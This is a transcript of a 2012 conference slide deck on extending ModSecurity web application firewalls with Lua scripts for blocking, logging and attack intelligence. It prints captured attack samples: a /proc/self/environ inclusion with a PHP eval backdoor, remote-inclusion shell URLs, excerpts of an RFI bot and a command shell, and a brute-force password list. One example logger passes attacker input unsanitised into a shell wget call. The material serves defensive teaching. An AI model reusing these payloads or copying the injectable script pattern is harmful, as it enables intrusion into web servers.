SlideShare a Scribd company logo

Teaching Your WAF New Tricks

Robert Rowley
Robert Rowley

This isn’t your uncle’s “what’s a WAF” talk, I’ll be covering as many cool tricks and advance topics related to deploying Web Application Firewalls. I will show you how to write custom scripts using lua and mod_security, and give first hand experiences of how I used scripting with a WAF to put the security team at my previous job ahead of the game when dealing with web app attacks. I will be including the source code for these example scripts which can be used to provide automatic incident response, counter-intelligence and more.

Technology
1 of 54
© 2012 Presented by: Teaching your WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
© 2012 Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
© 2012 Agenda • Preamble – Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
© 2012 Why me?
© 2012 Mod sec intro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
© 2012 mod_sec variables REQUEST_BODY REQUEST_COOKIES REQUEST_FILENAME REQUEST_HEADERS REQUEST_LINE REQUEST_METHOD REQUEST_URI RESPONSE_BODY RESPONSE_HEADERS SCRIPT_FILENAME SCRIPT_USERNAME TIME ARGS ARGS_NAMES AUTH_TYPE ENV FILES FILES_NAMES FILES_SIZES QUERY_STRING REMOTE_ADDR REMOTE_HOST REMOTE_PORT REMOTE_USER ...AND BEYOND!
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
© 2012© 2012 Adding Scripts!
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
© 2012 Not So Normal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
© 2012 A little lua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
© 2012 Using @inspectFile SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 SpiderLabs making it awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 Matching With Scripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 SpiderLabs making it awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
© 2012© 2012 Counter Intelligence
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
© 2012 rfi_logger.lua SecRule ARGS “^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
© 2012 <?php ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
© 2012 <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
© 2012 Better than a blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
© 2012 Better than a blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
© 2012 Put it together SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
© 2012 Put it together Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
© 2012 Data Mining Capture only on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
© 2012 Graphs!
© 2012 Graphs!
© 2012 Graphs!
© 2012 The WordPress Incident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
© 2012 The WordPress Incident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
© 2012 The WordPress Incident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 Bibliography/Questions?  http://www.modsecurity.org  http://www.lua.org  http://blog.spiderlabs.com SpiderLabs github  https://github.com/SpiderLabs You seriously want my code?  https://github.com/rawrly/ModSecScripts Take your pitchfork to me on twitter: @iamlei

Recommended

Crp
CrpCrp
CrpMarwah Ibrahim
 
Clinical laboratory basic
Clinical laboratory basicClinical laboratory basic
Clinical laboratory basicdoc30845
 
50 ways to make your first online sale from Shopify
50 ways to make your first online sale from Shopify50 ways to make your first online sale from Shopify
50 ways to make your first online sale from Shopify
YING LUI ALAN SIU
 
Discounted Labs CBC Panel Interpretation
Discounted Labs CBC Panel InterpretationDiscounted Labs CBC Panel Interpretation
Discounted Labs CBC Panel Interpretation
NELSON VERGEL
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
Blood transfusion reaction final
Blood transfusion reaction finalBlood transfusion reaction final
Blood transfusion reaction final
mauryaramgopal
 
O romantismo
O romantismoO romantismo
O romantismo
Ana Barreiros
 
Component prep and therapy
Component prep and therapyComponent prep and therapy
Component prep and therapy
wennalyn
 

Recommended

Crp
CrpCrp
CrpMarwah Ibrahim
 
Clinical laboratory basic
Clinical laboratory basicClinical laboratory basic
Clinical laboratory basicdoc30845
 
50 ways to make your first online sale from Shopify
50 ways to make your first online sale from Shopify50 ways to make your first online sale from Shopify
50 ways to make your first online sale from Shopify
YING LUI ALAN SIU
 
Discounted Labs CBC Panel Interpretation
Discounted Labs CBC Panel InterpretationDiscounted Labs CBC Panel Interpretation
Discounted Labs CBC Panel Interpretation
NELSON VERGEL
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
Blood transfusion reaction final
Blood transfusion reaction finalBlood transfusion reaction final
Blood transfusion reaction final
mauryaramgopal
 
O romantismo
O romantismoO romantismo
O romantismo
Ana Barreiros
 
Component prep and therapy
Component prep and therapyComponent prep and therapy
Component prep and therapy
wennalyn
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Itp
ItpItp
Itp
Bhupendra Shah
 
Cerco de Lisboa
Cerco de LisboaCerco de Lisboa
Cerco de Lisboa
Maria Henriques
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Interpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disordersInterpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disorders
Amaal Marey
 
The Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL InjectionThe Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL Injection
Patrycja Wegrzynowicz
 
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
Artur Filipe dos Santos
 
Bleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBABleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBA
Habibah Chaudhary
 
Chronic Leukaemia
Chronic LeukaemiaChronic Leukaemia
Chronic Leukaemia
Dr. Sandesh Shrestha
 
Itp
ItpItp
Itp
Vikas Karwasara
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
Christian Folini
 
Preanalytical error clinical chemical tests
Preanalytical error clinical chemical testsPreanalytical error clinical chemical tests
Preanalytical error clinical chemical tests
MEEQAT HOSPITAL
 
1. Mobile Application (In)security
1. Mobile Application (In)security1. Mobile Application (In)security
1. Mobile Application (In)security
Sam Bowne
 
Penetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity ProfessionalsPenetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity Professionals
211 Check
 
Blood transfusion complication
Blood transfusion complicationBlood transfusion complication
Blood transfusion complication
HoangPhung15
 
Presentation1 of ayesha
Presentation1 of ayeshaPresentation1 of ayesha
Presentation1 of ayesha
Laraib Ayesha
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
FIRST CONNECTIONS
FIRST CONNECTIONSFIRST CONNECTIONS
FIRST CONNECTIONSAshok Mishra
 
Sebastian
SebastianSebastian
Sebastian
sebastian davila velez
 
Chapter 17
Chapter 17Chapter 17
Chapter 17Morgan Bertrand
 
Tablettes
TablettesTablettes
Tablettes
Thu Tran Htn
 
Orientação Sexual
Orientação SexualOrientação Sexual
Orientação SexualAndreiDiogo
 

More Related Content

What's hot

Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Itp
ItpItp
Itp
Bhupendra Shah
 
Cerco de Lisboa
Cerco de LisboaCerco de Lisboa
Cerco de Lisboa
Maria Henriques
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Interpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disordersInterpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disorders
Amaal Marey
 
The Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL InjectionThe Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL Injection
Patrycja Wegrzynowicz
 
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
Artur Filipe dos Santos
 
Bleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBABleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBA
Habibah Chaudhary
 
Chronic Leukaemia
Chronic LeukaemiaChronic Leukaemia
Chronic Leukaemia
Dr. Sandesh Shrestha
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
Christian Folini
 
Preanalytical error clinical chemical tests
Preanalytical error clinical chemical testsPreanalytical error clinical chemical tests
Preanalytical error clinical chemical tests
MEEQAT HOSPITAL
 
1. Mobile Application (In)security
1. Mobile Application (In)security1. Mobile Application (In)security
1. Mobile Application (In)security
Sam Bowne
 
Penetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity ProfessionalsPenetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity Professionals
211 Check
 
Blood transfusion complication
Blood transfusion complicationBlood transfusion complication
Blood transfusion complication
HoangPhung15
 
Presentation1 of ayesha
Presentation1 of ayeshaPresentation1 of ayesha
Presentation1 of ayesha
Laraib Ayesha
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 

What's hot (17)

Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
 
Itp
ItpItp
Itp
 
Cerco de Lisboa
Cerco de LisboaCerco de Lisboa
Cerco de Lisboa
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Interpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disordersInterpretation of PT and PTT in coagulation disorders
Interpretation of PT and PTT in coagulation disorders
 
The Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL InjectionThe Hacker's Guide to NoSQL Injection
The Hacker's Guide to NoSQL Injection
 
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
História do porto igreja e torre dos clérigos, irmandade dos clérigos pobre...
 
Bleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBABleeding disorders Pathology Dr. UMME HABIBA
Bleeding disorders Pathology Dr. UMME HABIBA
 
Chronic Leukaemia
Chronic LeukaemiaChronic Leukaemia
Chronic Leukaemia
 
Itp
ItpItp
Itp
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
 
Preanalytical error clinical chemical tests
Preanalytical error clinical chemical testsPreanalytical error clinical chemical tests
Preanalytical error clinical chemical tests
 
1. Mobile Application (In)security
1. Mobile Application (In)security1. Mobile Application (In)security
1. Mobile Application (In)security
 
Penetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity ProfessionalsPenetration Testing for Cybersecurity Professionals
Penetration Testing for Cybersecurity Professionals
 
Blood transfusion complication
Blood transfusion complicationBlood transfusion complication
Blood transfusion complication
 
Presentation1 of ayesha
Presentation1 of ayeshaPresentation1 of ayesha
Presentation1 of ayesha
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 

Viewers also liked

Tablettes
TablettesTablettes
Tablettes
Thu Tran Htn
 
Orientação Sexual
Orientação SexualOrientação Sexual
Orientação SexualAndreiDiogo
 
111027 Diario La Nación
111027 Diario La Nación111027 Diario La Nación
111027 Diario La Nación
Mintrabajo
 
The Word
The WordThe Word
The Word
hardnett
 
Nimbus Ninjas Market Map
Nimbus Ninjas Market MapNimbus Ninjas Market Map
Nimbus Ninjas Market Mapnitnag
 
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Juan Cruz Vega
 
SMejiaResume (1)
SMejiaResume (1)SMejiaResume (1)
SMejiaResume (1)Sarah Mejia
 
Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad
 
CV S Sirkar 2016.docx
CV S Sirkar 2016.docx CV S Sirkar 2016.docx
CV S Sirkar 2016.docx Shahir Sirkar
 

Viewers also liked (15)

FIRST CONNECTIONS
FIRST CONNECTIONSFIRST CONNECTIONS
FIRST CONNECTIONS
 
Sebastian
SebastianSebastian
Sebastian
 
Chapter 17
Chapter 17Chapter 17
Chapter 17
 
Tablettes
TablettesTablettes
Tablettes
 
Orientação Sexual
Orientação SexualOrientação Sexual
Orientação Sexual
 
Edifice Profile
Edifice ProfileEdifice Profile
Edifice Profile
 
Comunicado alumnos liceo 2
Comunicado alumnos liceo 2Comunicado alumnos liceo 2
Comunicado alumnos liceo 2
 
111027 Diario La Nación
111027 Diario La Nación111027 Diario La Nación
111027 Diario La Nación
 
The Word
The WordThe Word
The Word
 
Nimbus Ninjas Market Map
Nimbus Ninjas Market MapNimbus Ninjas Market Map
Nimbus Ninjas Market Map
 
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
 
Constante dieléctrica
Constante dieléctricaConstante dieléctrica
Constante dieléctrica
 
SMejiaResume (1)
SMejiaResume (1)SMejiaResume (1)
SMejiaResume (1)
 
Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad Art-4
Rahul Prasad Art-4
 
CV S Sirkar 2016.docx
CV S Sirkar 2016.docx CV S Sirkar 2016.docx
CV S Sirkar 2016.docx
 

Similar to Teaching Your WAF New Tricks

Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
Ian Barber
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Ian Barber
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
Alan Pinstein
 
Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Rack
sickill
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
Alona Mekhovova
 
symfony on action - WebTech 207
symfony on action - WebTech 207symfony on action - WebTech 207
symfony on action - WebTech 207patter
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Jérémy Derussé
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
rjsmelo
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
Sam Keen
 
soft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.js
soft-shake.ch
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2
3camp
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascriptEldar Djafarov
 
Phing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowychPhing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowych
leafnode
 
WebGUI Developers Workshop
WebGUI Developers WorkshopWebGUI Developers Workshop
WebGUI Developers Workshop
Plain Black Corporation
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
xsist10
 
Write php deploy everywhere
Write php deploy everywhereWrite php deploy everywhere
Write php deploy everywhere
Michelangelo van Dam
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
Võ Duy Tuấn
 
Infrastructure = code - 1 year later
Infrastructure = code - 1 year laterInfrastructure = code - 1 year later
Infrastructure = code - 1 year later
Christian Ortner
 
Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscation
Sandro Zaccarini
 
Ansible new paradigms for orchestration
Ansible new paradigms for orchestrationAnsible new paradigms for orchestration
Ansible new paradigms for orchestration
Paolo Tonin
 

Similar to Teaching Your WAF New Tricks (20)

Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Rack
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
symfony on action - WebTech 207
symfony on action - WebTech 207symfony on action - WebTech 207
symfony on action - WebTech 207
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
